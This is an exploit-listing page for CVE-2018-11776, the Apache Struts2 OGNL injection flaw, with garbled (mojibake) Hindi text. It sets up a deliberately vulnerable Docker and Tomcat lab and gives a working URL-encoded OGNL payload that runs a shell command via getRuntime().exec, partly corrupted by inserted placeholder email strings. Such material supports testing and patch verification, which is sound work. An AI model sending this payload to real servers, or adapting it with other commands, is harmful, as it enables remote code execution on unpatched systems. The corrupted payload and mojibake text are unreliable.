Sploitus

Exploit for CVE-2018-11776

kitploit ┬╖ 2026-08-26

Exploit Code

MARKDOWN168 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BHDRESH-CVE-2018-11776
## CVE-2018-11776 рдХреЗ рд▓рд┐рдП рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рдбреЙрдХрд░ рдХрдВрдЯреЗрдирд░

root@kitploit:~
    
    
    # docker pull bhdresh/cve-2018-11776:1.0
    # docker run -dit -p <IP ADDRESS>:8080:8080 bhdresh/cve-2018-11776:1.0
    

### рдкреНрд░рдорд╛рдг-рдЕрд╡рдзрд╛рд░рдгрд╛

##### рдкреНрд░рдорд╛рдг-рдЕрд╡рдзрд╛рд░рдгрд╛ - 1

root@kitploit:~
    
    
    Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/${333+333}/help.action
    Result  : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/666/help.action
    

##### рдкреНрд░рдорд╛рдг-рдЕрд╡рдзрд╛рд░рдгрд╛ - 2

root@kitploit:~
    
    
    Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%some-email@example.com@getRuntime%28%29.exec%28%27touch /tmp/vulnerable%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%some-email@example.com@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/help.action
    Result  : рдЗрд╕рд╕реЗ рдбреЙрдХрд░ рдХреЗ /tmp/ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ 'vulnerable' рдирд╛рдордХ рдлрд╝рд╛рдЗрд▓ рдмрдиреЗрдЧреА
    
    

## рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рдбреЙрдХрд░ рдХрдВрдЯреЗрдирд░ рдмрдирд╛рдиреЗ рдХреЗ рдХрджрдо

##### Dockerfile рдмрдирд╛рдПрдБ

root@kitploit:~
    
    
    FROM ubuntu:latest
    RUN apt-get update -y
    RUN apt-get upgrade -y
    RUN apt-get dist-upgrade -y
    RUN apt-get install default-jdk vim net-tools wget -y
    EXPOSE 8080
    

##### рдбреЙрдХрд░ рдмрд┐рд▓реНрдб рдХрд░реЗрдВ

root@kitploit:~
    
    
    # docker build -t cve-2018-11776 .
    

##### рдбреЙрдХрд░ рд╢реБрд░реВ рдХрд░реЗрдВ

root@kitploit:~
    
    
    # docker run --name cve-2018-11776 -p <IP ADDRESS>:8080:8080 -dit cve-2018-11776 /bin/bash
    

##### рдбреЙрдХрд░ рдореЗрдВ рд▓реЙрдЧрд┐рди рдХрд░реЗрдВ

root@kitploit:~
    
    
    # docker exec -it cve-2018-11776 /bin/bash
    

##### рдбреЙрдХрд░ рдХреЗ рдЕрдВрджрд░ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдмрджрд▓рд╛рд╡ рдХрд░реЗрдВ

###### Tomcat рд╕реЗрдЯ рдЕрдк рдХрд░реЗрдВ:

root@kitploit:~
    
    
    # mkdir ~/sources
    # cd ~/sources
    # wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
    # tar xvzf apache-tomcat-7.0.90.tar.gz
    # mv apache-tomcat-7.0.90 /opt/tomcat
    

###### bashrc рдХреЛ рдЪрд░ рдХреЗ рд╕рд╛рде рдЕрдкрдбреЗрдЯ рдХрд░реЗрдВ:

root@kitploit:~
    
    
    # vim ~/.bashrc
    
    export JAVA_HOME=/usr/lib/jvm/default-java
    export CATALINA_HOME=/opt/tomcat
    
    # . ~/.bashrc
    

###### Tomcat GUI рдореЗрдВ рдПрдХ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЬреЛрдбрд╝реЗрдВ:

root@kitploit:~
    
    
    # vim /opt/tomcat/conf/tomcat-users.xml
    
    <user username="username" password="test-cve-2018-11776" roles="manager-gui,admin-gui" />
    

###### Tomcat рд╕рд░реНрд╡рд░ рд╢реБрд░реВ рдХрд░реЗрдВ

root@kitploit:~
    
    
    # $CATALINA_HOME/bin/startup.sh
    

###### Tomcat UI рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХ рдЕрд╕реБрд░рдХреНрд╖рд┐рдд Struts2 Showcase рдЕрдкрд▓реЛрдб рдФрд░ рддреИрдирд╛рдд рдХрд░реЗрдВ

root@kitploit:~
    
    
    http://<IP ADDRESS>:8080 (username:test-cve-2018-11776)
    

###### Tomcat рдкреБрдирд░рд╛рд░рдВрдн рдХрд░реЗрдВ

root@kitploit:~
    
    
    # $CATALINA_HOME/bin/shutdown.sh
    # $CATALINA_HOME/bin/startup.sh
    

###### рдиреЗрдорд╕реНрдкреЗрд╕ рдХреЗ рдмрд┐рдирд╛ рдПрдХ рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рд░реАрдбрд╛рдпрд░реЗрдХреНрд╢рди рдХреНрд░рд┐рдпрд╛ рдЬреЛрдбрд╝реЗрдВ:

root@kitploit:~
    
    
    # vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml
    
      <action name="help">
                  <result type="redirectAction">
                          <param name="actionName">date.action</param>
                  </result>
      </action>
    
    рдиреЛрдЯ: рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ, alwaysSelectFullNamespace рдХреЛ True рдкрд░ рд╕реЗрдЯ рдХрд┐рдпрд╛ рдЬрд╛рдирд╛ рдЪрд╛рд╣рд┐рдПред
    

###### Tomcat рдкреБрдирд░рд╛рд░рдВрдн рдХрд░реЗрдВ рдФрд░ Struts2 Showcase рдкреГрд╖реНрда рджреЗрдЦреЗрдВ:

root@kitploit:~
    
    
    # $CATALINA_HOME/bin/shutdown.sh
    # $CATALINA_HOME/bin/startup.sh
    
    http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/showcase.jsp
    

### рд▓реЗрдЦрдХ

@bhdresh

### рд╕рдВрджрд░реНрдн

https://github.com/xfox64x/CVE-2018-11776

https://github.com/jas502n/St2-057